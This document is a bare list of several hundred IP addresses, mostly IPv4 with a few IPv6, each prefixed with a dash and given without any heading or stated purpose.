-89.29.203.17 -120.25.70.20 -119.38.162.43 -176.31.210.47 -133.242.5.141 -61.183.20.23 -107.148.195.43 -119.23.27.88 -119.42.150.214 -108.170.59.219 -121.43.234.207 -108.160.145.212 -162.251.20.41 -112.74.131.177 -158.69.100.48 -108.61.202.186 -45.35.102.131 -23.225.0.117 -104.203.82.21 -198.16.54.37 -107.191.56.65 -107.187.41.160 -101.200.163.200 -121.40.99.45 -45.32.109.15 -54.234.245.48 -85.117.37.101 -54.242.253.88 -118.190.158.238 -52.67.105.198 -173.230.145.30 -222.85.137.64 -23.225.89.243 -5.189.142.143 -182.92.231.53 -130.185.73.69 -103.250.21.95 -103.1.237.249 -156.67.219.73 -45.42.94.148 -185.203.243.234 -122.114.6.64 -121.41.41.182 -114.55.90.247 -172.104.23.48 -120.26.232.175 -123.30.130.221 -173.236.115.47 -104.232.75.131 -112.121.100.251 -50.97.139.80 -216.224.170.36 -172.107.146.173 -50.116.56.56 -222.187.254.174 -60.205.115.115 -5.189.130.185 -106.15.44.64 -182.16.22.139 -114.55.248.198 -23.225.0.226 -198.1.92.170 -185.174.31.239 -120.24.166.202 -47.52.7.235 -80.85.85.44 -188.120.238.97 -60.173.255.253 -47.52.249.103 -23.244.241.231 -77.77.149.21 -201.30.147.19 -104.130.172.106 -178.32.190.84 -120.24.211.50 -80.87.240.42 -120.77.249.72 -45.114.94.104 -120.77.157.175 -194.28.89.169 -23.224.115.128 -74.50.61.114 -104.207.40.149 -183.81.161.168 -169.48.200.181 -190.11.254.57 -27.131.144.60 -35.194.189.230 -111.38.46.16 -23.225.0.31 -91.210.250.38 -47.74.149.101 -106.14.2.103 -45.32.120.159 -209.195.7.166 -202.149.74.77 -50.62.44.211 -121.43.196.163 -91.185.191.155 -158.69.166.109 -112.121.163.37 -80.82.127.227 -60.29.229.196 -45.56.98.30 -182.92.70.138 -217.182.221.26 -155.94.195.152 -172.104.53.51 -75.126.161.28 -188.246.205.163 -112.121.168.11 -149.71.234.22 -104.232.75.188 -27.111.217.123 -178.32.83.53 -45.41.92.146 -153.127.75.40 -31.3.153.40 -185.174.29.202 -85.235.217.102 -62.216.33.141 -123.15.45.187 -158.69.197.189 -179.43.152.35 -54.242.64.217 -45.35.102.167 -45.61.114.13 -23.104.135.188 -185.38.45.123 -103.80.80.247 -119.29.25.176 -65.18.120.13 -103.235.234.219 -114.215.200.220 -106.14.98.185 -104.217.67.66 -120.24.2.111 -49.85.104.95 -178.238.31.167 -64.61.5.133 -120.26.197.227 -103.28.37.120 -120.27.196.103 -43.243.75.41 -213.149.105.59 -172.110.22.243 -149.202.239.166 -67.20.61.159 -188.132.215.227 -120.26.202.246 -144.217.66.127 -149.202.80.158 -185.174.30.199 -114.55.7.157 -45.76.80.118 -185.66.141.114 -67.55.93.28 -142.44.178.34 -114.55.24.83 -37.187.213.147 -115.29.250.211 -5.135.58.66 -222.139.244.13 -119.29.235.82 -120.76.72.152 -23.251.222.185 -210.131.249.244 -191.6.48.54 -119.188.72.220 -91.134.179.85 -45.61.114.10 -123.56.72.239 -91.205.174.227 -188.116.12.189 -142.4.119.117 -47.94.4.106 -45.76.190.132 -218.93.206.220 -125.63.60.223 -176.31.16.57 -153.127.200.68 -103.78.195.30 -113.108.110.189 -37.58.76.160 -82.135.151.135 -52.67.110.57 -104.239.207.73 -172.246.101.41 -198.143.146.140 -216.119.150.45 -107.190.233.68 -81.2.251.49 -116.249.199.39 -200.217.218.240 -193.70.95.1 -167.114.54.90 -208.76.102.100 -119.23.69.33 -67.229.63.115 -139.162.16.236 -221.1.176.174 -88.150.157.36 -188.165.165.210 -67.229.72.74 -184.154.164.228 -104.216.198.68 -189.219.238.39 -182.92.115.221 -47.88.139.127 -23.225.239.112 -203.163.246.10 -207.246.125.22 -45.33.7.55 -79.137.45.242 -185.92.72.101 -112.126.69.136 -66.117.9.218 -23.244.190.207 -115.28.182.206 -74.50.61.117 -58.56.229.66 -185.5.53.187 -218.223.1.147 -60.190.43.114 -213.128.77.69 -182.16.57.76 -120.24.62.38 -162.144.147.10 -116.62.156.109 -193.104.170.219 -52.14.223.155 -120.77.174.169 -188.165.187.53 -14.104.81.39 -103.205.2.109 -104.203.82.234 -121.199.33.169 -34.253.188.57 -47.94.218.101 -139.196.125.197 -59.188.24.212 -142.4.107.87 -27.111.29.184 -81.213.104.107 -61.241.199.48 -120.76.155.15 -196.192.36.194 -45.77.34.78 -88.99.138.3 -23.253.160.62 -61.147.67.170 -194.88.213.129 -115.68.89.39 -202.6.17.158 -185.83.147.161 -103.41.126.5 -114.215.197.55 -157.7.243.230 -185.82.222.30 -104.203.82.63 -89.252.188.163 -184.107.210.36 -203.160.56.109 -124.158.7.248 -104.194.238.86 -34.228.97.160 -104.217.54.17 -104.207.40.135 -45.76.152.102 -198.50.247.25 -119.23.54.149 -218.204.113.77 -23.80.2.157 -95.213.224.38 -103.12.49.30 -86.104.177.40 -45.35.99.133 -91.109.242.25 -54.243.201.194 -103.205.3.71 -23.104.176.17 -103.100.157.144 -101.251.194.115 -188.165.189.66 -139.199.98.61 -45.32.43.96 -46.183.166.35 -120.24.184.75 -142.91.95.116 -88.82.102.55 -178.132.2.43 -120.26.227.147 -118.190.50.90 -77.245.158.250 -47.96.154.208 -35.196.246.96 -103.205.2.117 -23.104.187.52 -164.132.188.46 -109.206.96.221 -157.7.242.13 -46.252.188.10 -46.105.38.102 -144.76.135.203 -23.224.242.36 -114.215.78.219 -103.15.40.4 -218.78.246.88 -120.24.77.19 -45.61.114.16 -138.201.248.153 -37.187.71.112 -67.229.58.211 -119.38.160.30 -79.143.177.36 -111.231.109.17 -23.225.0.187 -35.201.191.54 -120.26.131.74 -106.187.101.244 -82.135.151.214 -47.88.241.99 -103.37.45.168 -103.74.117.251 -59.106.209.122 -185.174.29.197 -221.4.38.242 -118.125.243.14 -45.35.102.158 -121.199.16.187 -101.200.148.218 -23.88.82.169 -217.182.172.119 -109.235.252.152 -84.253.138.132 -173.214.110.230 -121.41.89.32 -69.1.97.76 -217.23.11.143 -106.14.14.192 -70.33.208.47 -107.6.168.134 -121.41.101.231 -157.7.130.85 -104.224.205.107 -106.14.250.202 -183.13.179.160 -111.93.4.166 -121.42.137.101 -202.4.107.68 -221.208.242.245 -198.8.88.203 -121.127.232.70 -200.24.90.34 -114.113.159.170 -125.212.245.235 -169.54.217.86 -121.199.43.97 -37.230.116.7 -89.108.106.129 -121.42.43.104 -119.10.73.245 -67.229.72.115 -218.32.216.248 -120.77.41.29 -54.200.18.117 -121.40.198.230 -124.173.117.201 -173.212.245.110 -67.229.63.113 -207.38.82.147 -115.159.154.196 -173.208.150.242 -209.236.119.85 -89.19.22.221 -101.200.191.153 -185.174.30.213 -188.165.187.50 -123.150.244.27 -112.84.184.208 -187.87.153.254 -166.62.81.152 -103.205.3.119 -91.237.108.35 -45.42.94.136 -112.78.10.109 -210.140.134.13 -111.85.191.253 -138.201.19.108 -158.69.39.24 -69.30.211.194 -121.40.167.91 -103.12.50.47 -121.42.187.104 -216.168.188.11 -47.93.99.143 -31.171.251.198 -61.164.132.242 -185.66.142.59 -103.254.14.210 -208.96.162.247 -45.126.133.39 -153.121.58.72 -23.224.115.72 -185.163.100.62 -23.88.82.213 -104.207.40.169 -103.12.51.41 -173.249.159.74 -118.190.72.252 -54.169.242.86 -18.216.31.251 -185.83.147.164 -74.206.239.54 -23.104.135.23 -104.232.75.133 -112.124.101.47 -92.63.104.171 -82.147.132.80 -45.77.37.83 -120.24.0.38 -193.45.5.85 -95.173.170.44 -88.50.28.156 -80.82.64.21 -104.207.44.87 -103.1.210.210 -72.52.126.145 -45.114.94.38 -125.253.116.35 -103.198.45.59 -85.204.96.107 -125.212.224.25 -104.224.202.167 -74.254.159.11 -50.62.23.184 -23.225.239.242 -23.225.89.197 -45.118.251.193 -115.160.154.34 -91.185.204.46 -173.249.25.75 -210.155.141.131 -45.114.94.117 -59.11.209.156 -119.81.203.106 -101.226.241.90 -218.32.216.181 -45.114.94.70 -120.25.62.202 -106.2.212.36 -103.28.38.177 -37.187.174.172 -142.4.96.81 -144.217.67.85 -94.124.90.156 -115.214.178.182 -115.214.178.182 -217.182.173.231 -185.163.100.219 -120.24.103.113 -173.82.151.208 -123.207.247.191 -64.120.123.226 -89.35.28.24 -54.234.169.243 -47.94.10.59 -114.55.137.49 -2605:6280:1:d::58 -89.33.247.5 -218.93.73.28 -64.120.123.230 -148.251.51.166 -103.100.157.228 -103.205.2.104 -82.135.148.122 -104.216.198.126 -121.33.112.241 -92.222.206.161 -1.119.8.71 -185.174.30.170 -94.228.215.117 -45.32.72.40 -199.119.140.73 -23.104.135.103 -120.55.49.91 -54.165.120.53 -45.76.165.30 -120.27.17.208 -34.240.229.225 -64.235.56.231 -103.205.1.101 -104.203.82.90 -142.4.107.90 -121.43.56.45 -193.151.107.240 -5.196.173.181 -45.79.206.27 -198.50.176.68 -23.225.0.114 -106.14.112.183 -2001:288:8224:1::4 -106.3.36.163 -37.59.40.208 -183.57.38.2 -121.40.221.192 -115.28.104.81 -119.29.63.21 -115.29.147.46 -188.132.148.117 -120.27.139.48 -93.115.243.14 -65.18.120.15 -198.89.122.209 -99.192.227.115 -89.42.24.118 -202.100.230.120 -185.146.86.26 -188.165.187.62 -120.27.27.44 -45.120.184.105 -50.57.223.231 -120.24.178.106 -89.33.247.33 -142.44.226.195 -72.52.162.67 -176.99.5.55 -45.61.114.8 -203.140.232.14 -172.107.147.38 -139.199.105.214 -72.1.245.45 -109.120.151.103 -46.248.164.195 -148.72.150.103 -88.99.92.103 -149.71.102.4 -45.63.12.178 -206.190.153.82 -75.126.121.183 -198.24.128.17 -173.236.115.223 -185.29.122.104 -172.246.101.11 -151.80.81.126 -101.229.171.66 -104.232.75.130 -86.106.82.101 -123.150.244.30 -124.160.123.114 -23.104.135.214 -45.61.112.41 -54.151.226.206 -113.196.233.245 -89.185.228.67 -185.174.28.146 -94.103.100.176 -54.65.224.241 -184.154.52.85 -104.232.75.175 -46.151.87.215 -195.189.16.154 -23.225.0.153 -66.254.178.27 -45.56.64.146 -120.27.124.65 -173.255.211.66 -36.37.80.194 -120.25.233.1 -91.218.231.76 -23.225.0.189 -45.118.251.189 -89.218.46.226 -176.31.209.72 -45.40.143.205 -104.232.75.176 -45.41.92.151 -106.15.102.44 -116.62.38.6 -103.242.175.228 -157.7.210.51 -198.200.41.19 -27.252.191.144 -104.129.41.99 -157.7.245.40 -124.192.148.6 -194.237.215.162 -124.127.186.28 -212.118.226.212 -42.96.187.78 -64.71.164.246 -185.65.246.215 -23.225.239.98 -121.201.1.106 -112.74.58.160 -45.114.94.64 -192.165.52.201 -23.224.115.251 -118.190.5.181 -101.81.250.154 -91.237.99.148 -92.244.36.144 -120.25.63.117 -87.98.171.217 -104.207.40.164 -103.197.57.29 -54.217.160.49 -153.122.56.150 -211.159.187.97 -91.121.40.81 -103.224.251.154 -178.20.155.11 -74.86.113.166 -47.93.231.109 -47.93.136.56 -123.57.33.79 -61.164.143.27 -207.246.99.63 -92.222.69.4 -176.31.12.233 -120.78.144.160 -58.97.21.225 -45.125.236.183 -149.202.211.19 -217.174.148.43 -218.75.63.109 -217.145.92.9 -172.105.232.181 -108.59.86.5 -23.88.82.161 -180.167.48.171 -192.225.225.37 -120.26.212.168 -204.209.210.69 -185.174.28.82 -91.134.144.9 -72.249.104.96 -112.74.212.237 -101.132.37.191 -42.121.123.199 -118.193.219.51 -120.27.217.166 -27.115.89.150 -218.32.216.160 -51.254.5.208 -39.106.149.22 -125.88.146.180 -107.180.79.196 -103.205.2.118 -123.57.225.203 -104.250.135.24 -103.243.252.179 -161.202.63.221 -46.30.41.205 -13.229.182.36 -89.203.249.86 -23.104.135.246 -157.7.196.156 -185.93.68.48 -49.212.174.223 -218.205.37.54 -45.248.68.238 -107.150.41.28 -50.97.74.132 -124.172.149.169 -113.10.190.37 -113.98.254.204 -178.32.28.172 -50.116.41.247 -136.243.178.189 -103.49.205.119 -52.45.156.39 -34.212.151.76 -101.203.173.25 -45.76.244.159 -45.79.68.41 -217.20.131.50 -118.178.87.232 -202.10.79.30 -192.249.112.46 -35.187.204.194 -173.255.212.49 -219.94.245.92 -83.99.221.20 -23.224.115.130 -104.207.40.183 -66.135.44.22 -192.99.36.133 -163.172.26.143 -2a01:7c8:fffa:83::2:2 -23.253.89.239 -144.217.20.81 -103.237.7.80 -120.24.224.235 -46.163.75.207 -104.216.198.56 -193.104.170.229 -193.151.90.52 -62.109.25.91 -79.137.45.236 -202.59.250.163 -104.238.148.229 -54.178.180.101 -160.16.197.62 -120.24.225.180 -140.114.78.70 -188.26.119.236 -164.132.60.2 -46.105.109.24 -212.68.46.55 -113.209.64.109 -158.69.100.50 -95.131.251.208 -23.225.89.111 -101.200.1.103 -144.217.194.10 -39.129.227.199 -157.7.248.10 -136.243.41.57 -119.23.249.41 -23.225.0.165 -61.12.86.92 -67.229.73.107 -72.1.245.60 -45.42.94.154 -106.243.243.9 -193.124.93.93 -50.93.199.189 -47.88.103.167 -23.104.180.55 -210.245.90.159 -43.249.30.84 -187.32.17.122 -222.171.182.12 -176.31.16.60 -121.199.57.203 -107.180.77.171 -101.201.66.61 -103.15.50.117 -54.198.224.250 -121.40.131.124 -23.224.115.208 -120.27.16.250 -120.26.56.145 -104.203.82.13 -5.189.170.205 -185.26.122.124 -162.144.114.146 -149.56.6.26 -120.25.255.50 -139.162.84.115 -101.200.196.180 -54.249.8.42 -119.23.105.15 -202.153.179.200 -104.207.50.111 -117.34.109.176 -113.106.92.178 -160.153.36.206 -23.224.115.51 -178.33.213.185 -104.216.198.79 -112.121.174.125 -52.201.52.104 -211.152.8.46 -45.114.94.33 -136.243.155.42 -171.244.32.154 -211.199.46.25 -45.61.112.54 -188.125.162.216 -103.249.31.169 -107.181.251.140 -123.207.228.43 -52.203.62.166 -118.178.59.29 -185.26.122.24 -60.214.233.229 -45.32.58.31 -115.159.77.241 -188.132.219.2 -112.74.91.85 -51.255.97.71 -195.248.234.197 -217.13.58.157 -38.123.253.111 -47.254.134.59 -184.154.126.27 -52.67.58.143 -113.10.168.133 -23.88.82.191 -116.62.167.175 -104.161.79.107 -125.64.17.105 -104.217.58.36 -119.23.105.219 -103.18.33.66 -203.66.120.124 -192.165.171.226 -35.170.230.219 -217.170.101.132 -45.63.60.28 -119.235.16.122 -114.215.254.54 -104.216.1.28 -101.201.196.140 -114.55.250.13 -206.40.115.124 -39.107.115.46 -18.216.105.29 -52.91.179.41 -45.76.179.39 -104.216.198.20 -89.252.188.169 -120.77.220.74 -139.224.144.125 -185.174.121.103 -218.244.151.139 -47.52.30.166 -120.24.65.20 -128.1.182.104 -37.59.81.73 -119.42.148.235 -72.1.245.127 -173.214.176.32 -153.120.74.203 -182.61.116.217 -120.132.12.85 -195.144.196.123 -217.15.49.140 -139.129.128.215 -64.15.149.95 -199.102.44.96 -120.25.214.113 -52.30.229.76 -92.222.207.59 -23.225.0.225 -104.207.44.81 -103.74.118.59 -172.107.147.12 -77.75.124.186 -169.55.1.28 -45.77.40.113 -54.80.145.185 -103.28.36.246 -112.74.72.89 -91.202.73.42 -118.69.81.130 -123.176.31.62 -101.0.4.130 -193.112.19.164 -191.6.48.61 -172.104.56.70 -91.134.141.238 -2600:3c02::f03c:91ff:fe70:5e33 -138.201.248.190 -120.36.142.58 -120.36.142.58 -37.59.213.78 -118.178.19.156 -112.124.49.38 -37.34.253.231 -162.214.18.21 -37.48.76.130 -182.16.1.218 -205.209.135.76 -184.95.52.34 -175.6.17.46 -153.122.25.124 -172.104.247.125 -67.222.96.138 -115.29.179.43 -119.29.78.150 -125.212.243.245 -45.63.124.124 -112.124.113.112 -23.104.177.34 -112.82.144.156 -104.238.149.169 -184.173.127.12 -180.250.246.98 -60.216.8.248 -124.129.236.87 -203.124.106.247 -46.105.103.207 -104.216.198.94 -216.117.137.101 -216.98.10.213 -82.102.14.12 -37.1.254.44 -45.35.99.183 -5.153.40.155 -106.15.32.117 -125.253.127.169 -174.139.70.150 -198.61.208.129 -45.76.180.236 -23.225.239.235 -114.55.151.35 -192.99.24.196 -47.104.58.68 -109.74.157.95 -123.57.233.83 -185.174.28.72 -64.91.229.68 -5.39.41.203 -45.61.112.18 -65.111.164.72 -185.174.30.225 -104.207.52.92 -178.211.54.56 -65.60.5.88 -45.79.156.234 -172.104.225.38 -54.211.211.196 -188.165.16.199 -121.41.18.116 -104.237.145.215 -185.82.223.70 -23.224.115.237 -218.32.216.187 -23.253.187.114 -103.85.184.254 -120.27.24.130 -103.56.17.67 -120.25.236.150 -185.85.73.252 -94.23.149.140 -103.205.3.105 -52.32.61.252 -91.210.250.45 -50.22.159.138 -120.26.81.56 -117.41.235.58 -69.87.199.10 -149.202.196.162 -54.238.228.92 -202.6.17.137 -114.215.190.197 -62.75.160.75 -103.224.250.199 -45.42.94.188 -188.165.223.55 -185.174.30.202 -103.28.39.159 -104.216.198.91 -195.24.196.179 -190.13.141.168 -92.222.202.127 -54.241.6.109 -185.174.100.118 -104.207.44.105 -52.14.219.76 -125.212.233.21 -23.225.89.97 -218.244.146.193 -195.248.235.40 -142.4.215.57 -5.196.216.42 -175.6.244.80 -121.40.115.68 -46.30.45.70 -61.155.8.175 -42.99.116.11 -23.252.164.32 -106.14.183.144 -188.225.18.222 -89.33.247.4 -174.139.71.119 -23.225.89.81 -103.81.86.25 -193.70.126.65 -178.32.40.92 -108.61.28.212 -153.122.75.38 -103.100.157.2 -111.56.62.237 -202.107.233.53 -209.236.68.39 -120.76.194.77 -39.106.129.82 -162.250.145.21 -54.193.58.206 -182.16.8.164 -158.69.63.10 -52.192.84.130 -139.199.63.24 -88.136.54.214 -23.225.239.31 -142.91.95.81 -54.154.49.174 -39.108.189.171 -180.167.16.93 -188.120.225.151 -185.163.100.55 -166.62.116.172 -45.248.68.42 -67.207.152.183 -139.196.30.131 -112.124.46.108 -185.163.100.180 -142.44.247.132 -142.91.95.183 -219.137.236.100 -115.29.245.5 -188.132.215.231 -111.230.195.186 -183.129.228.69 -221.132.27.156 -95.163.100.68 -123.56.232.42 -193.104.170.174 -45.61.115.57 -45.77.34.85 -5.196.44.176 -222.122.226.162 -119.145.78.226 -52.9.68.240 -190.131.226.250 -58.240.26.227 -74.208.149.103 -112.124.17.228 -96.30.47.161 -37.59.146.70 -122.225.90.14 -72.3.199.186 -118.190.103.108 -108.59.8.92 -54.238.141.136 -95.213.136.99 -176.31.16.62 -121.40.194.60 -47.90.16.161 -45.76.178.53 -207.195.118.51 -23.104.187.56 -213.152.173.133 -86.104.177.59 -104.216.198.196 -192.169.156.190 -123.57.8.155 -23.225.239.129 -182.16.110.11 -172.107.146.174 -45.61.114.43 -172.80.1.230 -23.252.171.22 -23.225.239.50 -118.89.115.238 -37.188.120.119 -118.178.224.106 -82.135.148.118 -66.8.77.99 -185.85.239.212 -23.244.190.99 -211.103.3.152 -54.199.176.18 -112.74.62.160 -104.207.40.176 -120.26.244.14 -23.244.190.106 -119.254.84.137 -217.115.113.110 -23.225.239.133 -47.52.231.91 -65.18.120.27 -99.192.209.84 -103.12.51.2 -171.244.0.103 -112.74.79.234 -47.75.14.86 -47.93.88.64 -121.42.51.128 -45.119.83.49 -121.196.222.129 -121.40.155.28 -109.201.146.106 -23.225.89.210 -54.225.229.83 -89.163.247.161 -96.30.50.33 -34.250.100.230 -142.4.107.235 -163.172.98.56 -188.128.118.117 -119.23.222.194 -85.254.49.125 -123.56.189.109 -65.19.143.198 -94.130.137.88 -45.76.188.224 -198.200.41.34 -103.12.68.5 -176.28.21.42 -103.205.2.106 -167.114.210.6 -91.192.108.213 -212.111.203.163 -120.27.103.23 -120.77.77.193 -74.50.61.62 -119.10.10.223 -104.223.1.89 -94.177.12.89 -37.48.64.70 -193.194.87.215 -45.114.94.176 -185.174.31.209 -99.192.222.72 -103.50.151.94 -210.5.43.251 -139.224.194.22 -124.172.139.88 -178.32.138.4 -2001:67c:20d1:1123::5 -2607:f1c0:815:4300::21:226d -23.88.82.245 -120.26.113.202 -67.229.58.201 -86.104.177.62 -142.4.119.103 -167.114.163.249 -188.120.241.201 -107.190.235.75 -149.202.80.157 -176.223.197.59 -116.62.208.129 -172.246.185.184 -172.104.35.171 -107.180.68.138 -111.16.49.20 -112.74.131.105 -104.238.140.182 -120.78.74.65 -216.245.210.227 -222.187.224.43 -122.225.100.132 -203.123.51.204 -54.166.108.28 -82.200.2.64 -23.225.89.31 -99.192.219.73 -207.210.68.46 -117.18.15.233 -139.162.45.219 -113.215.9.130 -103.56.157.127 -149.202.30.64 -120.197.50.63 -146.66.192.181 -136.0.69.7 -95.211.153.44 -112.124.101.205 -149.202.42.185 -132.148.146.60 -60.29.0.105 -104.216.198.171 -103.208.180.10 -115.231.222.82 -209.68.59.229 -176.31.240.88 -31.24.201.74 -45.79.209.44 -23.225.0.48 -193.104.170.225 -119.27.163.81 -147.135.255.62 -151.80.176.47 -122.99.118.167 -79.172.214.161 -47.93.123.34 -112.78.1.146 -47.52.201.144 -185.29.122.100 -104.128.228.205 -104.203.82.137 -182.253.236.178 -61.130.98.148 -186.233.191.20 -103.254.211.200 -149.71.99.110 -50.116.19.205 -103.205.2.123 -209.58.147.186 -47.91.132.194 -23.88.82.216 -103.25.203.177 -49.212.182.108 -188.116.12.144 -66.254.184.137 -50.112.105.97 -185.163.100.107 -45.120.184.41 -106.186.25.22 -45.76.191.20 -83.145.130.147 -111.230.220.137 -91.215.216.80 -107.181.251.145 -61.144.244.139 -23.252.170.24 -211.159.184.181 -31.131.251.43 -178.211.58.62 -104.203.82.129 -173.0.63.199 -209.236.126.62 -103.229.183.70 -23.88.82.152 -101.200.196.79 -45.114.94.18 -45.125.236.121 -211.159.164.19 -23.252.171.168 -103.9.159.118 -52.64.206.39 -114.55.230.100 -158.69.246.191 -112.74.167.20 -104.216.198.48 -206.190.153.79 -23.88.82.247 -104.216.198.131 -142.44.131.207 -23.253.70.218 -69.87.197.169 -192.155.93.247 -104.217.54.50 -118.31.237.9 -116.225.74.250 -23.244.190.132 -42.120.20.144 -121.43.152.31 -142.4.119.85 -59.124.64.161 -31.28.166.245 -216.158.235.9 -45.32.224.119 -113.116.145.80 -144.168.73.142 -175.45.49.121 -216.119.145.251 -168.235.66.162 -46.166.180.20 -204.93.61.126 -119.59.110.224 -104.217.58.25 -23.225.0.14 -202.102.89.72 -163.172.197.110 -195.178.5.193 -104.203.82.22 -72.1.245.121 -92.53.90.153 -121.40.95.64 -86.104.177.57 -106.75.134.177 -106.75.134.177 -104.203.139.247 -178.132.2.37 -101.200.199.143 -45.63.55.11 -62.212.130.157 -23.88.82.98 -173.214.190.85 -185.148.37.34 -218.244.158.58 -118.193.192.144 -54.38.33.182 -109.201.146.34 -109.235.252.131 -123.252.193.115 -2400:8901::f03c:91ff:fe08:f317 -111.68.14.245 -93.115.243.5 -54.237.20.156 -104.216.198.161 -104.203.139.233 -66.220.11.154 -142.4.107.202 -103.71.239.68 -173.255.245.43 -213.136.90.11 -23.225.0.70 -119.29.118.113 -103.81.168.159 -115.28.185.4 -45.125.236.206 -54.169.251.234 -120.24.100.218 -185.76.144.198 -23.80.2.155 -192.99.93.186 -138.201.180.155 -149.6.16.163 -120.79.181.240 -219.140.212.149 -89.163.141.182 -173.209.53.180 -23.253.73.182 -166.63.21.38 -54.38.36.10 -23.224.242.22 -87.98.254.246 -69.175.69.19 -54.36.79.41 -35.154.217.30 -52.78.191.249 -23.227.190.196 -69.87.199.2 -82.135.148.213 -123.57.228.79 -158.69.212.122 -52.40.113.36 -198.50.155.148 -120.27.119.187 -192.95.37.111 -198.50.234.189 -54.144.248.25 -23.88.82.229 -139.162.25.154 -81.196.51.167 -220.120.11.241 -59.52.241.21 -104.216.198.184 -164.70.8.84 -120.25.246.209 -136.0.56.108 -51.254.183.123 -210.245.38.141 -120.24.68.253 -66.147.232.16 -216.189.144.238 -89.19.6.166 -185.66.141.225 -91.227.16.111 -167.114.65.197 -123.56.235.69 -121.40.31.234 -45.77.71.100 -13.211.104.41 -120.24.78.101 -128.204.218.35 -118.190.96.142 -202.162.192.13 -103.74.117.184 -45.76.187.7 -120.25.240.221 -103.31.242.134 -120.79.49.123 -23.239.25.236 -45.125.236.94 -178.32.103.133 -103.24.205.205 -221.226.75.113 -173.236.25.30 -185.124.84.166 -157.7.160.35 -50.116.106.126 -185.12.6.218 -23.224.244.21 -23.104.135.69 -119.147.137.13 -23.224.244.34 -185.87.252.32 -192.158.30.108 -120.24.80.71 -88.86.113.119 -8.30.246.164 -148.251.174.84 -104.224.201.253 -118.102.24.41 -178.22.65.156 -123.52.78.156 -94.23.224.219 -45.33.112.39 -120.25.102.199 -23.253.57.52 -54.36.79.16 -178.32.28.164 -198.1.95.214 -72.1.245.39 -66.79.227.210 -139.199.94.254 -218.106.157.199 -118.184.45.55 -23.224.243.51 -172.104.33.88 -103.100.157.130 -88.199.122.249 -45.249.246.192 -113.10.158.134 -47.90.3.111 -104.217.58.59 -218.205.119.22 -23.244.190.140 -209.197.127.213 -69.64.55.10 -216.158.235.13 -23.224.244.3 -204.93.61.115 -85.14.111.134 -187.22.202.28 -134.119.50.80 -104.168.144.14 -104.217.62.34 -23.225.0.27 -94.23.207.11 -134.119.43.38 -18.231.15.135 -185.185.233.116 -1.60.17.28 -23.104.180.47 -23.224.244.14 -65.60.5.93 -104.217.62.39 -198.55.102.59 -188.132.135.52 -112.121.168.14 -185.182.96.83 -104.203.139.47 -23.225.239.225 -157.7.130.169 -82.135.151.168 -218.23.236.5 -142.91.95.174 -87.230.87.5 -38.27.100.198 -23.104.135.53 -193.180.164.106 -91.228.7.110 -89.163.131.157 -27.192.240.210 -212.57.36.79 -38.130.75.4 -34.228.20.88 -213.203.218.14 -175.41.251.78 -104.217.62.37 -61.191.49.185 -104.203.139.200 -45.42.94.150 -115.159.81.235 -104.217.58.38 -149.202.132.106 -54.148.240.143 -118.26.170.12 -120.76.212.33 -118.178.121.216 -103.100.157.58 -125.128.30.92 -172.104.186.81 -78.24.222.17 -112.25.55.102 -23.104.177.33 -23.104.135.48 -81.2.216.51 -121.40.150.133 -118.121.220.126 -120.25.98.175 -101.200.205.198 -177.39.17.171 -192.155.89.55 -132.148.148.98 -103.205.1.87 -178.32.209.114 -139.162.55.50 -210.16.120.150 -116.62.38.11 -190.63.153.232 -66.146.193.38 -104.232.102.162 -188.132.147.28 -52.1.190.29 -103.28.38.98 -37.72.185.242 -113.196.233.134 -185.106.23.15 -112.124.118.17 -203.140.232.105 -180.149.247.73 -68.168.104.76 -113.196.233.192 -149.56.109.34 -120.25.144.59 -82.135.151.117 -210.5.45.21 -185.163.100.130 -185.22.234.111 -121.40.39.77 -101.200.228.236 -172.246.101.247 -182.254.156.166 -203.160.188.36 -52.32.244.163 -45.33.86.131 -156.54.62.211 -85.118.131.126 -31.167.9.226 -118.190.16.224 -185.20.224.165 -23.21.65.150 -23.251.154.82 -60.205.188.135 -111.231.77.175 -212.90.186.157 -103.243.94.232 -85.24.136.241 -106.14.221.58 -45.122.220.177 -132.148.19.185 -123.31.41.28 -37.187.3.187 -5.199.133.86 -121.40.203.215 -23.225.0.162 -211.83.241.162 -103.37.147.222 -180.178.60.238 -5.160.219.8 -213.136.87.40 -118.193.209.195 -123.57.136.39 -31.131.21.231 -23.225.0.188 -45.56.127.192 -106.14.10.47 -51.255.87.3 -216.131.78.206 -216.131.68.117 -103.82.32.39 -138.201.201.226 -121.199.59.34 -81.171.34.40 -91.227.16.118 -222.255.37.15 -104.223.53.112 -112.78.5.131 -178.33.171.87 -35.153.70.62 -107.165.201.73 -125.253.127.183 -45.117.168.248 -156.17.110.61 -45.79.165.191 -52.69.77.251 -185.124.84.168 -82.135.148.131 -212.227.108.239 -45.76.156.158 -104.217.58.32 -208.92.165.61 -147.135.221.17 -153.128.38.41 -104.216.198.113 -104.232.102.163 -153.36.233.168 -103.229.192.69 -121.43.231.39 -49.4.70.35 -2600:3c00::f03c:91ff:fe33:fe6a -93.174.163.189 -185.48.236.108 -49.212.190.103 -154.56.1.240 -104.216.198.176 -212.113.35.45 -123.207.246.128 -133.242.121.218 -120.24.218.132 -104.216.198.129 -54.37.216.233 -125.253.127.129 -125.253.127.153 -103.63.109.181 -47.97.4.137 -104.207.52.126 -39.108.109.29 -209.236.120.217 -120.27.97.153 -115.28.150.75 -125.253.127.190 -101.251.111.153 -178.32.246.96 -177.69.103.161 -217.23.138.12 -104.203.139.81 -125.253.127.110 -178.32.42.127 -94.23.120.46 -222.191.250.135 -123.56.144.126 -219.90.122.44 -125.253.127.105 -188.93.22.220 -116.62.126.186 -195.181.223.95 -81.171.38.191 -103.231.70.228 -45.79.197.159 -114.215.81.201 -59.42.255.220 -198.24.128.26 -125.253.127.103 -123.30.139.46 -81.171.34.31 -94.141.68.105 -45.42.94.138 -123.30.183.180 -125.253.127.194 -216.131.67.205 -216.131.75.11 -118.190.136.5 -125.253.127.149 -125.253.127.139 -125.253.127.116 -60.205.181.191 -125.253.127.164 -58.119.18.13 -125.253.127.187 -125.253.127.114 -174.142.115.230 -23.104.177.5 -66.85.158.108 -108.170.39.90 -198.245.55.40 -192.232.192.40 -125.253.127.136 -185.174.30.147 -85.105.112.242 -23.224.244.36 -23.224.245.48 -125.253.127.161 -45.35.99.177 -210.172.192.81 -50.116.3.250 -114.215.183.216 -198.204.240.100 -213.136.74.247 -182.92.6.16 -125.253.127.130 -202.154.189.3 -103.41.127.116 -104.216.198.199 -54.163.17.186 -212.24.109.64 -78.140.130.251 -91.121.86.146 -81.171.38.167 -88.99.182.49 -125.253.127.126 -103.48.83.136 -123.31.29.153 -125.253.127.147 -125.253.127.118 -125.253.127.121 -45.76.159.215 -101.201.121.223 